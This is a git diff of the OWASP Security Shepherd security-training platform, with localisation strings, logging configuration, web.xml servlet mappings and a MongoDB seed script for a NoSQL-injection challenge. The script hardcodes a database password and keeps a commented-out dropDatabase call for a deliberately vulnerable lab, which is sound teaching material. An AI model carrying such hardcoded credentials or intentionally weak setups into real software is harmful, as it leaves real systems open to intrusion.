-blockedMessage.text.info.levelBlocked=\u4F60\u505A\u7684\u975E\u5E38\u597D! \u7BA1\u7406\u5458\u5F53\u524D\u5DF2\u5C06\u8FD9\u4E2A\u7EA7\u522B\u6807\u8BB0\u4E3A\u5173\u95ED\u72B6\u6001. \u8981\u4E86\u89E3\u8BE5\u7EA7\u522B\u4F55\u65F6\u518D\u5F00\u653E,\u4F60\u9700\u8981\u5411\u8BE5\u7A0B\u5E8F\u7684\u8D1F\u8D23\u4EBA\u8BE2\u95EE!
-getStarted.text.moduleInfo.openFloor=\u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u5355\u51FB\u5217\u8868\u5934,<span><a>\u8BFE\u7A0B</a></span> \u6216 <span><a>\u6A21\u5757</a></span>, \u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!
-getStarted.text.moduleInfo.incrementalFloor=\u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6311\u6218\u5F00\u59CB\u5427!\u4ECE\u70B9\u51FB\u9760\u5DE6\u8FB9\u7684'\u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218'\u6309\u952E\u5F00\u59CB!
-getStarted.text.moduleInfo=\u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u70B9\u51FB\u5217\u8868\u5934<span><a>\u73B0\u573A\u57F9\u8BAD</a></span>\u6216<span><a>Corporal</a></span>,\u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!\u5728\u5DE6\u4FA7\u5217\u8868\u7684\u6A21\u5757\u4E2D,\u8D8A\u5F80\u4E0B\u7684\u6A21\u5757\u503C\u8D8A\u591A\u7684\u5206\u6570!
-ggetStarted.text.configureShepherd.asAnAdmin=As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
-getStarted.text.checkShepConfigMsg=If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
-getStarted.text.info.changePassword=Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
-login.text.info=\u7528\u4F60\u7684 <a><span>Security Shepherd \u8BC1\u4E66<span></a> \u767B\u5F55.
-login.text.regInfo=\u6CE8\u518C\u4E00\u4E2A <a href="register.jsp"><span>Security Shepherd \u5E10\u6237</span></a>!
-login.text.about_blurb=The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=OWASP Security Shepherd \u9879\u76EE\u7684\u5168\u7EC4\u4EBA\u5458\u7531\u8877\u7684\u611F\u8C22\u8D5E\u52A9\u5546\u4EEC\u7684\u5927\u529B\u652F\u6301\u002C\u8BF7\u901A\u8FC7\u67E5\u770B\u4ED6\u4EEC\u7684\u7F51\u7AD9\u548C Twitter \u6765\u5173\u6CE8\u4ED6\u4EEC\u002E.
-login.text.thanks=OWASP Security Shepherd \u9879\u76EE\u7EC4\u8FD8\u8981\u7279\u522B\u611F\u8C22\u5B89\u4E1C\u5C3C\u00B7\u57FA\u6069\u535A\u58EB\u548C\u7231\u5C14\u5170\u5E03\u5170\u5BDF\u7406\u5DE5\u5B66\u9662\u5B89\u5168\u7814\u7A76\u9662\u7684\u652F\u6301" https://owasp.securityShepherd.eu.
-readyToPlay.text.info.notReady=Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
-readyToPlay.text.info.enteredGame=Now that you can see this, you're good to go! Get cracking on lessons and challenges! <br/><br/> Remember, the levels you are playing are sub applications. Keep the game play in these applications!  Stay away from your session ID's! You'll just log yourself out of you change them!<br/><br/> If you havn't already configured a web proxy, you better! It makes things much easier!
+generic.text.aboutSecShep =\u5173\u4E8E Security Shepherd
+generic.text.admin = \u7BA1\u7406\u5458
+generic.text.cheat = \u63D0\u793A
+generic.text.challenges = \u6311\u6218
+generic.text.commentMessage.1 = You are currently looking at the core server. 
+generic.text.commentMessage.2 = Nothing related to the levels in Security Shepherd will be found in here. 
+generic.text.commentMessage.3 = You might be looking for the iframe embedded in the page. 
+generic.text.commentMessage.4 = \u4F7F\u7528\u5982 Firebug \u8FD9\u6837\u7684\u5DE5\u5177\u8BA9\u751F\u6D3B\u66F4\u7B80\u5355.
+generic.text.configuration = \u914D\u7F6E
+generic.text.configureShepherd = \u914D\u7F6E Shepherd
+generic.text.confirmPasswd = \u786E\u8BA4\u5BC6\u7801
+generic.text.confirmEmailAddr = \u786E\u8BA4\u90AE\u7BB1\u5730\u5740
+generic.text.emailAddr = \u90AE\u7BB1\u5730\u5740
+generic.text.lessons = \u8BFE\u7A0B
+generic.text.login = \u767B\u5F55
+generic.text.logout = \u6CE8\u9500
+generic.text.loading = \u52A0\u8F7D\u4E2D...
+generic.text.ssRegister = OWASP Security Shepherd - \u6CE8\u518C
+generic.text.password = \u5BC6\u7801
+generic.text.pleaseWait = \u8BF7\u7A0D\u4FAF!
+generic.text.register = \u6CE8\u518C
+generic.text.scoreboard = \u8BB0\u5206\u677F
+generic.text.searchModules = Search Modules
+generic.text.shepherdVersion = Security Shepherd \u7248\u672C: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = \u5728\u8FD9\u63D0\u4EA4\u7ED3\u679C\u94A5\u5319
+generic.text.submit = \u63D0\u4EA4
+generic.text.username = \u7528\u6237\u540D
+generic.text.welcome = \u6B22\u8FCE
+
+getter.button.completed = \u5B8C\u6210
+getter.button.nextChallenge = \u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218
+getter.button.finished = \u4F60\u5DF2\u7ECF\u5B8C\u6210!
+getter.button.noModulesFound = \u6CA1\u6709\u677F\u5757
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = \u8BA9\u6211\u4EEC\u5F00\u59CB\u5427
+getStarted.button.openLevels.all = Open All Levels
+getStarted.button.openLevels.web = Open Web App Levels Only
+getStarted.button.openLevels.mobile = Open Mobile Levels Only
+getStarted.button.closeLevels = Close All Levels
+blockedMessage.text.heading.levelBlocked = Level Currently Blocked
+index.link.admin.cheatSheet.manage = Cheat Sheet Management
+index.link.admin.cheatSheet.manage.create = Create New Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = Disable Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Enable Cheat Sheets
+index.link.admin.config.change = Change Module Layout
+index.link.admin.config.feedback = Feedback Configuration
+index.link.admin.config.openClose = Open/Close Registration
+index.link.admin.config.scoreboard = Scoreboard Configuration
+index.link.admin.config.coreDb = Set Core Database
+index.link.admin.moduleManage = Module Management
+index.link.admin.moduleManage.block = Module Block Setup
+index.link.admin.moduleManage.openClose = Open and Close Modules
+index.link.admin.moduleManage.openCloseCategory = Open or Close by Category
+index.link.admin.moduleManage.feedback = View Feedback
+index.link.admin.moduleManage.progress = View Progress
+index.link.admin.userMange = User Management
+index.link.admin.userMange.addPlayer = Add Players
+index.link.admin.userMange.addPoints = Add / Deduct Player Points
+index.link.admin.userMange.assignPlayer = Assign Players to Class
+index.link.admin.userMange.createClass = Create Class
+index.link.admin.userMange.createAdmin = Create New Admin
+index.link.admin.userMange.resetPass = Reset Password
+index.link.admin.userMange.setDefaultPlayerClass = Set Default Player Class
+index.link.admin.userMange.suspendPlayer = Suspend Player
+index.link.admin.userMange.unsuspendPlayer = Undo Suspend Player
+index.link.admin.userMange.upgradeToAdmin = Upgrade Player to Admin
+login.text.sponsers = Project Sponsors
+readyToPlay.title.readyToPlay = Security Shepherd - \u51C6\u5907\u597D\u4E86\u5417?
+readyToPlay.header.notReady = \u8FD8\u6CA1\u51C6\u5907\u597D!
+readyToPlay.title.enteredGame = \u5DF2\u7ECF\u8FDB\u5165\u6E38\u620F!
+login.text.proxy_question = \u4F60\u9700\u8981\u4EE3\u7406\u5417?
+login.text.download_proxy = \u4E0B\u8F7D \u4E00\u4E2A HTTP \u4EE3\u7406
+
+
+login.link.zap_win = ZAP Windows \u7248
+login.link.zap_lin = ZAP Linux \u7248
+login.link.zap_mac = ZAP Mac \u7248
+
+
+blockedMessage.text.info.levelBlocked = \u4F60\u505A\u7684\u975E\u5E38\u597D! \u7BA1\u7406\u5458\u5F53\u524D\u5DF2\u5C06\u8FD9\u4E2A\u7EA7\u522B\u6807\u8BB0\u4E3A\u5173\u95ED\u72B6\u6001. \u8981\u4E86\u89E3\u8BE5\u7EA7\u522B\u4F55\u65F6\u518D\u5F00\u653E,\u4F60\u9700\u8981\u5411\u8BE5\u7A0B\u5E8F\u7684\u8D1F\u8D23\u4EBA\u8BE2\u95EE!
+getStarted.text.moduleInfo.openFloor = \u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u5355\u51FB\u5217\u8868\u5934,<span><a>\u8BFE\u7A0B</a></span> \u6216 <span><a>\u6A21\u5757</a></span>, \u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!
+getStarted.text.moduleInfo.incrementalFloor = \u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6311\u6218\u5F00\u59CB\u5427!\u4ECE\u70B9\u51FB\u9760\u5DE6\u8FB9\u7684'\u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218'\u6309\u952E\u5F00\u59CB!
+getStarted.text.moduleInfo = \u4F60\u5DF2\u6CE8\u518C\u6210\u529F,\u8BA9\u6211\u4EEC\u4ECESecurity Shepherd\u7684\u4E00\u4E9B\u6A21\u5757\u5F00\u59CB\u5427!\u8981\u5F00\u59CB\u4E00\u4E2A\u6A21\u5757,\u70B9\u51FB\u5217\u8868\u5934<span><a>\u73B0\u573A\u57F9\u8BAD</a></span>\u6216<span><a>Corporal</a></span>,\u5728\u5DE6\u4FA7\u83DC\u5355\u680F\u770B\u54EA\u4E9B\u6A21\u5757\u662F\u5F53\u524D\u53EF\u7528\u7684!\u5728\u5DE6\u4FA7\u5217\u8868\u7684\u6A21\u5757\u4E2D,\u8D8A\u5F80\u4E0B\u7684\u6A21\u5757\u503C\u8D8A\u591A\u7684\u5206\u6570!
+ggetStarted.text.configureShepherd.asAnAdmin = As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
+getStarted.text.checkShepConfigMsg = If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
+getStarted.text.info.changePassword = Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
+login.text.info = \u7528\u4F60\u7684 <a><span>Security Shepherd \u8BC1\u4E66<span></a> \u767B\u5F55.
+login.text.regInfo = \u6CE8\u518C\u4E00\u4E2A <a href="register.jsp"><span>Security Shepherd \u5E10\u6237</span></a>!
+login.text.about_blurb = The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = OWASP Security Shepherd \u9879\u76EE\u7684\u5168\u7EC4\u4EBA\u5458\u7531\u8877\u7684\u611F\u8C22\u8D5E\u52A9\u5546\u4EEC\u7684\u5927\u529B\u652F\u6301\u002C\u8BF7\u901A\u8FC7\u67E5\u770B\u4ED6\u4EEC\u7684\u7F51\u7AD9\u548C Twitter \u6765\u5173\u6CE8\u4ED6\u4EEC\u002E.
+login.text.thanks = OWASP Security Shepherd \u9879\u76EE\u7EC4\u8FD8\u8981\u7279\u522B\u611F\u8C22\u5B89\u4E1C\u5C3C\u00B7\u57FA\u6069\u535A\u58EB\u548C\u7231\u5C14\u5170\u5E03\u5170\u5BDF\u7406\u5DE5\u5B66\u9662\u5B89\u5168\u7814\u7A76\u9662\u7684\u652F\u6301" https://owasp.securityShepherd.eu.
+readyToPlay.text.info.notReady = Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
+readyToPlay.text.info.enteredGame = Now that you can see this, you're good to go! Get cracking on lessons and challenges! <br/><br/> Remember, the levels you are playing are sub applications. Keep the game play in these applications!  Stay away from your session ID's! You'll just log yourself out of you change them!<br/><br/> If you havn't already configured a web proxy, you better! It makes things much easier!
 
 
 
diff --git a/src/main/resources/log4j2.properties b/src/main/resources/log4j2.properties
index 36aebb48f..83447d088 100644
--- a/src/main/resources/log4j2.properties
+++ b/src/main/resources/log4j2.properties
@@ -1,54 +1,65 @@
-status=debug
-name=PropertiesConfig
-property.basePath=${sys:catalina.home}/logs
-property.filename=security-shepherd.log
-filter.threshold.type=ThresholdFilter
-filter.threshold.level=debug
-appender.console.type=Console
-appender.console.name=LogToConsole
-appender.console.layout.type=PatternLayout
-appender.console.layout.pattern=%5p %X{ctx:RemoteAddress} @ %d{dd MMM HH:mm:ss,SSS} [%t] (%F:%L) - %m%n
-appender.console.filter.threshold.type=ThresholdFilter
-appender.console.filter.threshold.level=debug
+status = debug
+name = PropertiesConfig
+
+property.basePath = ${sys:catalina.home}/logs
+property.filename = security-shepherd.log
+
+filter.threshold.type = ThresholdFilter
+filter.threshold.level = debug
+
+appender.console.type = Console
+appender.console.name = LogToConsole
+appender.console.layout.type = PatternLayout
+appender.console.layout.pattern = %5p %X{ctx:RemoteAddress} @ %d{dd MMM HH:mm:ss,SSS} [%t] (%F:%L) - %m%n
+appender.console.filter.threshold.type = ThresholdFilter
+appender.console.filter.threshold.level = debug
+
 # Rolling file name, location etc.
-appender.rolling.type=RollingFile
-appender.rolling.name=LogToFile
-appender.rolling.fileName=${basePath}/${filename}
-appender.rolling.filePattern=${basePath}/security-shepherd/sec-shep-%d{MM-dd-yy-HH-mm-ss}%i.log.gz
-appender.rolling.layout.type=PatternLayout
-appender.rolling.layout.pattern=%p %X{ctx:RemoteAddress} @ %d{dd MMM HH:mm:ss,SSS} %t %c - %m%n
+appender.rolling.type = RollingFile
+appender.rolling.name = LogToFile
+appender.rolling.fileName = ${basePath}/${filename}
+appender.rolling.filePattern = ${basePath}/security-shepherd/sec-shep-%d{MM-dd-yy-HH-mm-ss}%i.log.gz
+appender.rolling.layout.type = PatternLayout
+appender.rolling.layout.pattern = %p %X{ctx:RemoteAddress} @ %d{dd MMM HH:mm:ss,SSS} %t %c - %m%n
+
 # Rolling file rotation policy
-appender.rolling.policies.type=Policies
-appender.rolling.policies.size.type=SizeBasedTriggeringPolicy
+appender.rolling.policies.type = Policies
+appender.rolling.policies.size.type = SizeBasedTriggeringPolicy
 appender.rolling.policies.size.size=20MB
-appender.rolling.strategy.type=DefaultRolloverStrategy
-appender.rolling.strategy.max=2
+appender.rolling.strategy.type = DefaultRolloverStrategy
+appender.rolling.strategy.max = 2
+
 # Set loggers for each of the packages
-logger.rolling1.name=challenges
-logger.rolling1.level=debug
+logger.rolling1.name = challenges
+logger.rolling1.level = debug
 # send to root logger too
-logger.rolling1.additivity=true
-logger.rolling1.appenderRef.rolling.ref=LogToFile
-logger.rolling2.name=dbProcs
-logger.rolling2.level=debug
+logger.rolling1.additivity = true
+logger.rolling1.appenderRef.rolling.ref = LogToFile
+
+logger.rolling2.name = dbProcs
+logger.rolling2.level = debug
 # send to root logger too
-logger.rolling2.additivity=true
-logger.rolling2.appenderRef.rolling.ref=LogToFile
-logger.rolling3.name=lessons
-logger.rolling3.level=debug
+logger.rolling2.additivity = true
+logger.rolling2.appenderRef.rolling.ref = LogToFile
+
+logger.rolling3.name = lessons
+logger.rolling3.level = debug
 # send to root logger too
-logger.rolling3.additivity=true
-logger.rolling3.appenderRef.rolling.ref=LogToFile
-logger.rolling4.name=servlets
-logger.rolling4.level=debug
+logger.rolling3.additivity = true
+logger.rolling3.appenderRef.rolling.ref = LogToFile
+
+logger.rolling4.name = servlets
+logger.rolling4.level = debug
 # send to root logger too
-logger.rolling4.additivity=true
-logger.rolling4.appenderRef.rolling.ref=LogToFile
-logger.rolling5.name=utils
-logger.rolling5.level=debug
+logger.rolling4.additivity = true
+logger.rolling4.appenderRef.rolling.ref = LogToFile
+
+logger.rolling5.name = utils
+logger.rolling5.level = debug
 # send to root logger too
-logger.rolling5.additivity=true
-logger.rolling5.appenderRef.rolling.ref=LogToFile
+logger.rolling5.additivity = true
+logger.rolling5.appenderRef.rolling.ref = LogToFile
+
 # set the root logger to be the console
-rootLogger.level=debug
-rootLogger.appenderRef.stdout.ref=LogToConsole
+rootLogger.level = debug
+rootLogger.appenderRef.stdout.ref = LogToConsole
diff --git a/src/main/resources/mongodb/moduleSchemas.js b/src/main/resources/mongodb/moduleSchemas.js
index 1ac43456c..7c32d1a4e 100644
--- a/src/main/resources/mongodb/moduleSchemas.js
+++ b/src/main/resources/mongodb/moduleSchemas.js
@@ -1,3 +1,4 @@
+
 //-- ======================================================
 //-- NoSQL Injection One
 //-- ======================================================
@@ -6,16 +7,16 @@
 //REMOVE db.dropDatabase()
 //REMOVE db = db.getSiblingDB('shepherdGames')
 
-db.createUser({"user": "gamer1", "pwd": "$ecSh3pdb", "roles": [{"role": "read", "db": "shepherdGames"}]})
+db.createUser({ "user": "gamer1", "pwd": "$ecSh3pdb", "roles": [{"role": "read", "db": "shepherdGames" }] })
 db.createCollection("gamer")
 
 db.gamer.insert
 ([
-    {_id: "77b6eab74151d73c2efe561737981a1fbb2291fe3643680f5824e47f69fc9985", name: "Omar", address: "Baltimore"},
-    {_id: "fd1b4a1d16714cee9c1320f3e7465792010d0911075b7c1002071d48e68e19b4", name: "Stringer", address: "Baltimore"},
-    {_id: "b43c05a8166b5bbc5e2baebbbc84a71f83fd7cac01dd5d23bb6e003a95d60b7c", name: "Jimmy", address: "Baltimore"},
-    {_id: "c09f32d4c3dd5b75f04108e5ffc9226cd8840288a62bdaf9dc65828ab6eaf86a", name: "Marlo", address: "Baltimore"},
-    {_id: "b6c02d3459803a3e3bf99a8c5a20e2f661a8296bbeec858110d3597aaa9b830a", name: "Clayton", address: "Baltimore"},
-    {_id: "4b54501900f31f40832a67accf8ab97150a7cb7938d814dffd534e64b1e658bd", name: "Lester", address: "Baltimore"}
+    { _id : "77b6eab74151d73c2efe561737981a1fbb2291fe3643680f5824e47f69fc9985", name : "Omar", address : "Baltimore" },
+    { _id : "fd1b4a1d16714cee9c1320f3e7465792010d0911075b7c1002071d48e68e19b4", name : "Stringer", address : "Baltimore" },
+    { _id : "b43c05a8166b5bbc5e2baebbbc84a71f83fd7cac01dd5d23bb6e003a95d60b7c", name : "Jimmy", address : "Baltimore" },
+    { _id : "c09f32d4c3dd5b75f04108e5ffc9226cd8840288a62bdaf9dc65828ab6eaf86a", name : "Marlo", address : "Baltimore" },
+    { _id : "b6c02d3459803a3e3bf99a8c5a20e2f661a8296bbeec858110d3597aaa9b830a", name : "Clayton", address : "Baltimore" },
+    { _id : "4b54501900f31f40832a67accf8ab97150a7cb7938d814dffd534e64b1e658bd", name : "Lester", address : "Baltimore" }
 
 ])
diff --git a/src/main/resources/uri.properties b/src/main/resources/uri.properties
index 4b72ed992..fb36e214d 100644
--- a/src/main/resources/uri.properties
+++ b/src/main/resources/uri.properties
@@ -6,6 +6,6 @@ owasp.attack.sessionManagement=https://www.owasp.org/index.php/Testing_for_Sessi
 owasp.attack.xxe=https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
 owasp.attack.xss=https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
 owasp.defend.unvalidatedRedirectsAndForwards=https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
-owasp.otg.buslogic.001=https://www.owasp.org/index.php/Test_business_logic_data_validation_(OTG-BUSLOGIC-001)
+owasp.otg.buslogic.001 = https://www.owasp.org/index.php/Test_business_logic_data_validation_(OTG-BUSLOGIC-001)
 owasp.top10.failureToRestrictUrlAccess=https://www.owasp.org/index.php/Top_10_2010-A8-Failure_to_Restrict_URL_Access
 owasp.top10.insecureCryptoStorage=https://www.owasp.org/index.php/Top_10_2010-A7-Insecure_Cryptographic_Storage
diff --git a/src/main/webapp/WEB-INF/web.xml b/src/main/webapp/WEB-INF/web.xml
index 58b258432..46c8ef658 100644
--- a/src/main/webapp/WEB-INF/web.xml
+++ b/src/main/webapp/WEB-INF/web.xml
@@ -1,1348 +1,1319 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee"
-         xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"
-         xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"
-         id="WebApp_ID" version="2.5">
-
-    <display-name>Security Shepherd</display-name>
-    <welcome-file-list>
-        <welcome-file>index.html</welcome-file>
-        <welcome-file>index.htm</welcome-file>
-        <welcome-file>index.jsp</welcome-file>
-        <welcome-file>default.html</welcome-file>
-        <welcome-file>default.htm</welcome-file>
-        <welcome-file>default.jsp</welcome-file>
-    </welcome-file-list>
-
-    <jsp-config>
-        <jsp-property-group>
-            <url-pattern>*.jsp</url-pattern>
-            <page-encoding>UTF-8</page-encoding>
-        </jsp-property-group>
-    </jsp-config>
-
-    <error-page>
-        <error-code>403</error-code>
-        <location>/serverError.jsp</location>
-    </error-page>
-    <error-page>
-        <error-code>404</error-code>
-        <location>/lostSheep.jsp</location>
-    </error-page>
-    <error-page>
-        <error-code>500</error-code>
-        <location>/serverError.jsp</location>
-    </error-page>
-    <error-page>
-        <exception-type>java.lang.Exception</exception-type>
-        <location>/serverError.jsp</location>
-    </error-page>
-
-    <env-entry>
-        <env-entry-name>java.net.preferipv4stack</env-entry-name>
-        <env-entry-type>java.lang.String</env-entry-type>
-        <env-entry-value>true</env-entry-value>
-    </env-entry>
-
-    <servlet>
-        <servlet-name>/setup</servlet-name>
-        <servlet-class>servlets.Setup</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/setup</servlet-name>
-        <url-pattern>/setup</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/login</servlet-name>
-        <servlet-class>servlets.Login</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/login</servlet-name>
-        <url-pattern>/login</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/ssologin</servlet-name>
-        <servlet-class>servlets.SSOLogin</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/ssologin</servlet-name>
-        <url-pattern>/saml/dologin</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/ssometadata</servlet-name>
-        <servlet-class>servlets.SSOMetadata</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/ssometadata</servlet-name>
-        <url-pattern>/saml/metadata.xml</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/acs</servlet-name>
-        <servlet-class>servlets.ACS</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/acs</servlet-name>
-        <url-pattern>/saml/acs</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/sls</servlet-name>
-        <servlet-class>servlets.SLS</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/sls</servlet-name>
-        <url-pattern>/saml/sls</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/mobileLogin</servlet-name>
-        <servlet-class>servlets.MobileLogin</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/mobileLogin</servlet-name>
-        <url-pattern>/mobileLogin</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/register</servlet-name>
-        <servlet-class>servlets.Register</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/register</servlet-name>
-        <url-pattern>/register</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/refreshMenu</servlet-name>
-        <servlet-class>servlets.module.RefreshMenu</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/refreshMenu</servlet-name>
-        <url-pattern>/refreshMenu</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/logout</servlet-name>
-        <servlet-class>servlets.Logout</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/logout</servlet-name>
-        <url-pattern>/logout</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/passwordChange</servlet-name>
-        <servlet-class>servlets.ChangePassword</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/passwordChange</servlet-name>
-        <url-pattern>/passwordChange</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/usernameChange</servlet-name>
-        <servlet-class>servlets.ChangeUsername</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/usernameChange</servlet-name>
-        <url-pattern>/usernameChange</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/createNewAdmin</servlet-name>
-        <servlet-class>servlets.admin.userManagement.CreateNewAdmin</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/createNewAdmin</servlet-name>
-        <url-pattern>/createNewAdmin</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/createNewClass</servlet-name>
-        <servlet-class>servlets.admin.userManagement.CreateClass</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/createNewClass</servlet-name>
-        <url-pattern>/createNewClass</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/addPlayer</servlet-name>
-        <servlet-class>servlets.admin.userManagement.AddPlayer</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/addPlayer</servlet-name>
-        <url-pattern>/addPlayer</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/deletePlayers</servlet-name>
-        <servlet-class>servlets.admin.userManagement.DeletePlayers</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/deletePlayers</servlet-name>
-        <url-pattern>/deletePlayers</url-pattern>
-    </servlet-mapping>
-
-
-    <servlet>
-        <servlet-name>/assignPlayers</servlet-name>
-        <servlet-class>servlets.admin.userManagement.AssignPlayers</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/assignPlayers</servlet-name>
-        <url-pattern>/assignPlayers</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/setDefaultRegistrationClass</servlet-name>
-        <servlet-class>servlets.admin.userManagement.SetDefaultClass</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/setDefaultRegistrationClass</servlet-name>
-        <url-pattern>/setDefaultRegistrationClass</url-pattern>
-    </servlet-mapping>
-
-
-    <servlet>
-        <servlet-name>/getPlayersByClass</servlet-name>
-        <servlet-class>servlets.admin.userManagement.GetPlayersByClass</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/getPlayersByClass</servlet-name>
-        <url-pattern>/getPlayersByClass</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/suspendPlayer</servlet-name>
-        <servlet-class>servlets.admin.userManagement.SuspendUser</servlet-class>
-    </servlet>
-    <servlet-mapping>
-        <servlet-name>/suspendPlayer</servlet-name>
-        <url-pattern>/suspendPlayer</url-pattern>
-    </servlet-mapping>
-
-    <servlet>
-        <servlet-name>/unSuspendPlayer</servlet-name>
-        <servlet-class>servlets.admin.userManagement.UnSuspendUser</servlet-class>
-    </servlet>
-    <servlet-mapping>
